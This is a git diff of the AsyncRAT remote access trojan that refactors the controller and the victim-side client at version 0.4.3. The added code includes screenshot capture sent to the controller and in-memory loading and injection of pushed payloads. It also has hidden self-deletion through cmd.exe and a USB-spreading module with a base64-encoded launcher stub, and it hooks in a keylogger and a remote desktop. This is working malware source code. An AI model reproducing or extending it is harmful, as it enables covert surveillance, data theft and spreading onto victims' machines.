+ {
+ if (Program.form1.listView3.InvokeRequired)
+ {
+ Program.form1.listView3.BeginInvoke((MethodInvoker)(() =>
+ {
+ if (client.LV2 == null)
+ {
+ client.LV2 = new ListViewItem();
+ client.LV2.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
+ client.LV2.ToolTipText = client.ID;
+ using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
+ {
+ Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
+ client.LV2.ImageKey = client.ID;
+ Program.form1.listView3.BeginUpdate();
+ Program.form1.listView3.Items.Insert(0, client.LV2);
+ Program.form1.listView3.EndUpdate();
+ }
+ }
+ else
+ {
+ using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
+ {
+ Program.form1.listView3.BeginUpdate();
+ Program.form1.imageList1.Images.RemoveByKey(client.ID);
+ Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
+ Program.form1.listView3.EndUpdate();
+ }
+ }
+ }));
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs
new file mode 100644
index 0000000..8a73428
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs
@@ -0,0 +1,105 @@
+using AsyncRAT_Sharp.Sockets;
+using AsyncRAT_Sharp.MessagePack;
+using System;
+using System.Diagnostics;
+using System.Drawing;
+using AsyncRAT_Sharp.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public static class Packet
+ {
+ public static void Read(object Obj)
+ {
+ try
+ {
+ object[] array = Obj as object[];
+ byte[] data = (byte[])array[0];
+ Clients client = (Clients)array[1];
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes(data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "ClientInfo":
+ {
+ new HandleListView().AddToListview(client, unpack_msgpack);
+ break;
+ }
+
+ case "Ping":
+ {
+ new HandlePing(client, unpack_msgpack);
+ break;
+ }
+
+ case "Logs":
+ {
+ new HandleLogs().Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
+ break;
+ }
+
+ case "thumbnails":
+ {
+ new HandleThumbnails(client, unpack_msgpack);
+ break;
+ }
+
+ case "BotKiller":
+ {
+ new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
+ break;
+ }
+
+ case "usbSpread":
+ {
+ new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
+ break;
+ }
+
+ case "Received":
+ {
+ new HandleListView().Received(client);
+ break;
+ }
+
+ case "remoteDesktop":
+ {
+ new HandleRemoteDesktop().Capture(client, unpack_msgpack);
+ break;
+ }
+
+ case "processManager":
+ {
+ new HandleProcessManager().GetProcess(client, unpack_msgpack);
+ break;
+ }
+
+
+ case "socketDownload":
+ {
+ new HandleFileManager().SocketDownload(client, unpack_msgpack);
+ break;
+ }
+
+ case "keyLogger":
+ {
+ new HandleKeylogger(client, unpack_msgpack);
+ break;
+ }
+
+ case "fileManager":
+ {
+ new HandleFileManager().FileManager(client, unpack_msgpack);
+ break;
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine(ex.Message);
+ }
+ //GC.Collect();
+ //GC.WaitForPendingFinalizers();
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs
index 6518bfb..cd61575 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs
@@ -24,7 +24,6 @@ namespace AsyncRAT_Sharp
await Task.Delay(interval);
o.Opacity += 0.05;
}
- o.Opacity = 1;
}
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe
index f2fc8d2..2971d82 100644
Binary files a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe differ
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
index 37713f0..d66ba0f 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
@@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp
public static string Password { get; set; }
public static Aes256 AES{ get; set; }
- public static readonly string Version = "AsyncRAT 0.4.2";
+ public static readonly string Version = "AsyncRAT 0.4.3";
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
index b863b16..b51800f 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
@@ -11,7 +11,7 @@ using AsyncRAT_Sharp.MessagePack;
namespace AsyncRAT_Sharp.Sockets
{
- class Clients
+ public class Clients
{
public Socket ClientSocket { get; set; }
public ListViewItem LV { get; set; }
@@ -23,7 +23,7 @@ namespace AsyncRAT_Sharp.Sockets
private MemoryStream ClientMS { get; set; }
public object SendSync { get; } = new object();
private object EndSendSync { get; } = new object();
- public int BytesRecevied { get; set; }
+ public long BytesRecevied { get; set; }
public Clients(Socket socket)
{
@@ -69,11 +69,11 @@ namespace AsyncRAT_Sharp.Sockets
{
try
{
- ThreadPool.QueueUserWorkItem(HandlePacket.Read, new object[] { Settings.AES.Decrypt(ClientMS.ToArray()), this });
+ ThreadPool.QueueUserWorkItem(Packet.Read, new object[] { Settings.AES.Decrypt(ClientMS.ToArray()), this });
}
catch (CryptographicException)
{
- HandleLogs.Addmsg($"Client {ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password, IP blocked", Color.Red);
+ new HandleLogs().Addmsg($"Client {ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password, IP blocked", Color.Red);
Settings.Blocked.Add(ClientSocket.RemoteEndPoint.ToString().Split(':')[0]);
Disconnected();
return;
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs
index fc4aeb7..bf93c23 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs
@@ -26,7 +26,7 @@ namespace AsyncRAT_Sharp.Sockets
};
Server.Bind(ipEndPoint);
Server.Listen(30);
- HandleLogs.Addmsg($"Listenning {port}", Color.Green);
+ new HandleLogs().Addmsg($"Listenning {port}", Color.Green);
Server.BeginAccept(EndAccept, null);
}
catch (Exception ex)
@@ -76,7 +76,7 @@ namespace AsyncRAT_Sharp.Sockets
if (count > 4)
{
Settings.Blocked.Add(socket.RemoteEndPoint.ToString().Split(':')[0]);
- HandleLogs.Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} tried to spam, IP blocked", Color.Red);
+ new HandleLogs().Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} tried to spam, IP blocked", Color.Red);
foreach (Clients client in Settings.Online.ToList())
{
if (client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0] == socket.RemoteEndPoint.ToString().Split(':')[0] && client.LV != null)
diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index 4f12e1d..bdeea1e 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -73,14 +73,16 @@
-
+
-
-
-
-
-
-
+
+
+
+
+
+
+
+
diff --git a/AsyncRAT-C#/Client/Handle Packet/FileManager.cs b/AsyncRAT-C#/Client/Handle Packet/FileManager.cs
index ed58441..a2b03be 100644
--- a/AsyncRAT-C#/Client/Handle Packet/FileManager.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/FileManager.cs
@@ -11,7 +11,7 @@ using System.Diagnostics;
using System.Net.Sockets;
namespace Client.Handle_Packet
{
- class FileManager
+ public class FileManager
{
public void GetDrivers()
{
diff --git a/AsyncRAT-C#/Client/Handle Packet/BotKiller.cs b/AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
similarity index 97%
rename from AsyncRAT-C#/Client/Handle Packet/BotKiller.cs
rename to AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
index 3d7f78b..4a6fc9f 100644
--- a/AsyncRAT-C#/Client/Handle Packet/BotKiller.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
@@ -14,7 +14,7 @@ using Client.Sockets;
namespace Client.Handle_Packet
{
- class BotKiller
+ public class HandleBotKiller
{
int count = 0;
public void RunBotKiller()
@@ -57,7 +57,7 @@ namespace Client.Handle_Packet
return false;
}
- private static bool IsWindowVisible(string lHandle)
+ private bool IsWindowVisible(string lHandle)
{
return IsWindowVisible(lHandle);
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleGetScreenShot.cs b/AsyncRAT-C#/Client/Handle Packet/HandleGetScreenShot.cs
new file mode 100644
index 0000000..87e9d49
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleGetScreenShot.cs
@@ -0,0 +1,33 @@
+using Client.MessagePack;
+using Client.Sockets;
+using System;
+using System.Collections.Generic;
+using System.Drawing;
+using System.Drawing.Imaging;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Windows.Forms;
+
+namespace Client.Handle_Packet
+{
+ public class HandleGetScreenShot
+ {
+ public HandleGetScreenShot()
+ {
+ Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
+ using (Graphics g = Graphics.FromImage(bmp))
+ using (MemoryStream memoryStream = new MemoryStream())
+ {
+ g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
+ Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
+ thumb.Save(memoryStream, ImageFormat.Jpeg);
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "thumbnails";
+ msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+ bmp.Dispose();
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs b/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
similarity index 99%
rename from AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs
rename to AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
index bef3206..dc2963e 100644
--- a/AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
@@ -14,7 +14,7 @@ namespace Client.Handle_Packet
// This program is distributed for educational purposes only.
- class LimeLogger
+ public static class HandleLimeLogger
{
public static bool isON = false;
public static void Run()
diff --git a/AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs b/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
similarity index 98%
rename from AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs
rename to AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
index 3f4b18b..48a3649 100644
--- a/AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
@@ -10,7 +10,6 @@ using Microsoft.CSharp;
using System.CodeDom.Compiler;
using Client.MessagePack;
using Client.Sockets;
-using System.Threading;
using System.Windows.Forms;
//
// │ Author : NYAN CAT
@@ -22,7 +21,7 @@ using System.Windows.Forms;
namespace Client.Handle_Packet
{
- class LimeUSB
+ public class HandleLimeUSB
{
public void Run()
{
@@ -163,10 +162,10 @@ namespace Client.Handle_Packet
try
{
string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
+ source = source.Replace("LimeUSBModule", Randomz(new Random().Next(6, 12)));
source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
source = source.Replace("%File%", infectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
source = source.Replace("%Lime%", spreadSettings.InfectedTrademark);
- source = source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
source = source.Replace("%Guid%", Guid.NewGuid().ToString());
CompilerParameters cParams = new CompilerParameters();
diff --git a/AsyncRAT-C#/Client/Handle Packet/ProcessManager.cs b/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
similarity index 95%
rename from AsyncRAT-C#/Client/Handle Packet/ProcessManager.cs
rename to AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
index 6a45190..687df03 100644
--- a/AsyncRAT-C#/Client/Handle Packet/ProcessManager.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
@@ -11,9 +11,9 @@ using System.Text;
namespace Client.Handle_Packet
{
- class ProcessManager
+ public class HandleProcessManager
{
- public static void ProcessKill(int ID)
+ public void ProcessKill(int ID)
{
foreach (var process in Process.GetProcesses())
{
@@ -29,7 +29,7 @@ namespace Client.Handle_Packet
ProcessList();
}
- public static void ProcessList()
+ public void ProcessList()
{
StringBuilder sb = new StringBuilder();
var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
diff --git a/AsyncRAT-C#/Client/Handle Packet/RemoteDesktop.cs b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
similarity index 98%
rename from AsyncRAT-C#/Client/Handle Packet/RemoteDesktop.cs
rename to AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
index c1efba1..c355ccd 100644
--- a/AsyncRAT-C#/Client/Handle Packet/RemoteDesktop.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
@@ -13,7 +13,7 @@ using System;
namespace Client.Handle_Packet
{
- class RemoteDesktop
+ public class HandleRemoteDesktop
{
public void CaptureAndSend()
{
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs b/AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs
new file mode 100644
index 0000000..04d8846
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs
@@ -0,0 +1,56 @@
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Threading;
+using Client.MessagePack;
+
+namespace Client.Handle_Packet
+{
+ public class HandleSendTo
+ {
+ public void SendToDisk(MsgPack unpack_msgpack)
+ {
+ string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
+ unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
+ Process.Start(fullPath);
+ if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
+ {
+ new HandleUninstall();
+ }
+ }
+
+ public void SendToMemory(MsgPack unpack_msgpack)
+ {
+ byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
+ string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
+ byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
+ if (injection.Length == 0)
+ {
+ new Thread(delegate ()
+ {
+ Assembly loader = Assembly.Load(buffer);
+ object[] parm = null;
+ if (loader.EntryPoint.GetParameters().Length > 0)
+ {
+ parm = new object[] { new string[] { null } };
+ }
+ loader.EntryPoint.Invoke(null, parm);
+ })
+ { IsBackground = true }.Start();
+
+ }
+ else
+ {
+ new Thread(delegate ()
+ {
+ Assembly loader = Assembly.Load(plugin);
+ MethodInfo meth = loader.GetType("Plugin.Program").GetMethod("Run");
+ meth.Invoke(null, new object[] { buffer, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), injection) });
+ })
+ { IsBackground = true }.Start();
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
new file mode 100644
index 0000000..2157f7b
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
@@ -0,0 +1,44 @@
+using Client.Helper;
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Text;
+
+namespace Client.Handle_Packet
+{
+ public class HandleUninstall
+ {
+ public HandleUninstall()
+ {
+ if (Convert.ToBoolean(Settings.Install))
+ {
+ try
+ {
+ Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
+ }
+ catch { }
+ }
+ ProcessStartInfo Del = null;
+ try
+ {
+ Del = new ProcessStartInfo()
+ {
+ Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
+ WindowStyle = ProcessWindowStyle.Hidden,
+ CreateNoWindow = true,
+ FileName = "cmd.exe"
+ };
+ }
+ catch { }
+ finally
+ {
+ Methods.CloseMutex();
+ Process.Start(Del);
+ Environment.Exit(0);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
similarity index 58%
rename from AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
rename to AsyncRAT-C#/Client/Handle Packet/Packet.cs
index 4dd7bf1..9a278e2 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -1,11 +1,7 @@
-using Client.Helper;
-using Client.MessagePack;
+using Client.MessagePack;
using Client.Sockets;
-using Microsoft.Win32;
using System;
using System.Diagnostics;
-using System.Drawing;
-using System.Drawing.Imaging;
using System.IO;
using System.Net.Sockets;
using System.Threading;
@@ -13,7 +9,7 @@ using System.Windows.Forms;
namespace Client.Handle_Packet
{
- class HandlePacket
+ public static class Packet
{
public static void Read(object data)
{
@@ -38,40 +34,21 @@ namespace Client.Handle_Packet
case "thumbnails":
{
- GetScreenShot();
+ new HandleGetScreenShot();
}
break;
case "sendFile":
{
Received();
- string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
- unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
- Process.Start(fullPath);
- if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
- {
- Uninstall();
- }
+ new HandleSendTo().SendToDisk(unpack_msgpack);
}
break;
case "sendMemory":
{
Received();
- byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
- string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
- byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
- object[] parameters = new object[] { buffer, injection, plugin };
- Thread thread = null;
- if (injection.Length == 0)
- {
- thread = new Thread(new ParameterizedThreadStart(SendToMemory.Reflection));
- }
- else
- {
- thread = new Thread(new ParameterizedThreadStart(SendToMemory.RunPE));
- }
- thread.Start(parameters);
+ new HandleSendTo().SendToMemory(unpack_msgpack);
}
break;
@@ -102,30 +79,30 @@ namespace Client.Handle_Packet
case "uninstall":
{
- Uninstall();
+ new HandleUninstall();
}
break;
case "usbSpread":
{
- LimeUSB limeUSB = new LimeUSB();
+ HandleLimeUSB limeUSB = new HandleLimeUSB();
limeUSB.Run();
+ break;
}
- break;
case "remoteDesktop":
{
- switch (unpack_msgpack.ForcePathObject("Option").AsString)
- {
- case "true":
- {
- RemoteDesktop remoteDesktop = new RemoteDesktop();
+ // switch (unpack_msgpack.ForcePathObject("Option").AsString)
+ //{
+ //case "true":
+ // {
+ HandleRemoteDesktop remoteDesktop = new HandleRemoteDesktop();
remoteDesktop.CaptureAndSend();
- }
- break;
+ break;
+ // }
}
- }
- break;
+ // break;
+ // }
case "processManager":
{
@@ -133,15 +110,15 @@ namespace Client.Handle_Packet
{
case "List":
{
- ProcessManager.ProcessList();
+ new HandleProcessManager().ProcessList();
+ break;
}
- break;
case "Kill":
{
- ProcessManager.ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
+ new HandleProcessManager().ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
+ break;
}
- break;
}
}
break;
@@ -154,39 +131,37 @@ namespace Client.Handle_Packet
{
FileManager fileManager = new FileManager();
fileManager.GetDrivers();
+ break;
}
- break;
case "getPath":
{
FileManager fileManager = new FileManager();
fileManager.GetPath(unpack_msgpack.ForcePathObject("Path").AsString);
+ break;
}
- break;
case "uploadFile":
{
string fullPath = unpack_msgpack.ForcePathObject("Name").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
+ break;
}
- break;
case "deleteFile":
{
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
File.Delete(fullPath);
+ break;
}
- break;
case "execute":
{
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
Process.Start(fullPath);
+ break;
}
- break;
}
-
-
}
break;
@@ -196,16 +171,15 @@ namespace Client.Handle_Packet
string file = unpack_msgpack.ForcePathObject("File").AsString;
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
fileManager.DownnloadFile(file, dwid);
-
+ break;
}
- break;
case "botKiller":
{
- BotKiller botKiller = new BotKiller();
+ HandleBotKiller botKiller = new HandleBotKiller();
botKiller.RunBotKiller();
+ break;
}
- break;
case "keyLogger":
{
@@ -215,16 +189,16 @@ namespace Client.Handle_Packet
{
new Thread(() =>
{
- LimeLogger.isON = true;
- LimeLogger.Run();
+ HandleLimeLogger.isON = true;
+ HandleLimeLogger.Run();
}).Start();
}
else
{
- LimeLogger.isON = false;
+ HandleLimeLogger.isON = false;
}
+ break;
}
- break;
case "visitURL":
{
@@ -233,8 +207,8 @@ namespace Client.Handle_Packet
{
Process.Start(url);
}
+ break;
}
- break;
}
}
catch { }
@@ -247,53 +221,5 @@ namespace Client.Handle_Packet
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
-
- private static void Uninstall()
- {
- if (Convert.ToBoolean(Settings.Install))
- {
- try
- {
- Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
- }
- catch { }
- }
- ProcessStartInfo Del = null;
- try
- {
- Del = new ProcessStartInfo()
- {
- Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
- WindowStyle = ProcessWindowStyle.Hidden,
- CreateNoWindow = true,
- FileName = "cmd.exe"
- };
- }
- catch { }
- finally
- {
- Methods.CloseMutex();
- Process.Start(Del);
- Environment.Exit(0);
- }
- }
-
- private static void GetScreenShot()
- {
- Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
- using (Graphics g = Graphics.FromImage(bmp))
- using (MemoryStream memoryStream = new MemoryStream())
- {
- g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
- Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
- thumb.Save(memoryStream, ImageFormat.Jpeg);
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "thumbnails";
- msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
- ClientSocket.BeginSend(msgpack.Encode2Bytes());
- }
- bmp.Dispose();
- }
-
}
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/SendToMemory.cs b/AsyncRAT-C#/Client/Handle Packet/SendToMemory.cs
deleted file mode 100644
index c3d6553..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/SendToMemory.cs
+++ /dev/null
@@ -1,37 +0,0 @@
-using System;
-using System.IO;
-using System.Reflection;
-using System.Runtime.InteropServices;
-
-namespace Client.Handle_Packet
-{
- class SendToMemory
- {
- public static void Reflection(object obj)
- {
- object[] parameters = (object[])obj;
- byte[] buffer = (byte[])parameters[0];
- Assembly loader = Assembly.Load(buffer);
- object[] parm = null;
- if (loader.EntryPoint.GetParameters().Length > 0)
- {
- parm = new object[] { new string[] { null } };
- }
- loader.EntryPoint.Invoke(null, parm);
- }
-
- public static void RunPE(object obj)
- {
- try
- {
- object[] parameters = (object[])obj;
- byte[] file = (byte[])parameters[0];
- string injection = Convert.ToString(parameters[1]);
- byte[] plugin = (byte[])parameters[2];
- Assembly loader = Assembly.Load(plugin);
- loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { file, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), injection) });
- }
- catch { }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs
index 61e31fe..d212167 100644
--- a/AsyncRAT-C#/Client/Settings.cs
+++ b/AsyncRAT-C#/Client/Settings.cs
@@ -8,7 +8,7 @@ namespace Client
{
public static readonly string Ports = "6606";
public static readonly string Host = "127.0.0.1";
- public static readonly string Version = "AsyncRAT 0.4.2";
+ public static readonly string Version = "AsyncRAT 0.4.3";
public static readonly string Install = "false";
public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";
diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
index fce8090..23c6779 100644
--- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
+++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
@@ -120,7 +120,7 @@ namespace Client.Sockets
MS.Write(Buffer, 0, recevied);
if (MS.Length == Buffersize)
{
- ThreadPool.QueueUserWorkItem(HandlePacket.Read, Settings.aes256.Decrypt(MS.ToArray()));
+ ThreadPool.QueueUserWorkItem(Packet.Read, Settings.aes256.Decrypt(MS.ToArray()));
Buffer = new byte[4];
MS.Dispose();
MS = new MemoryStream();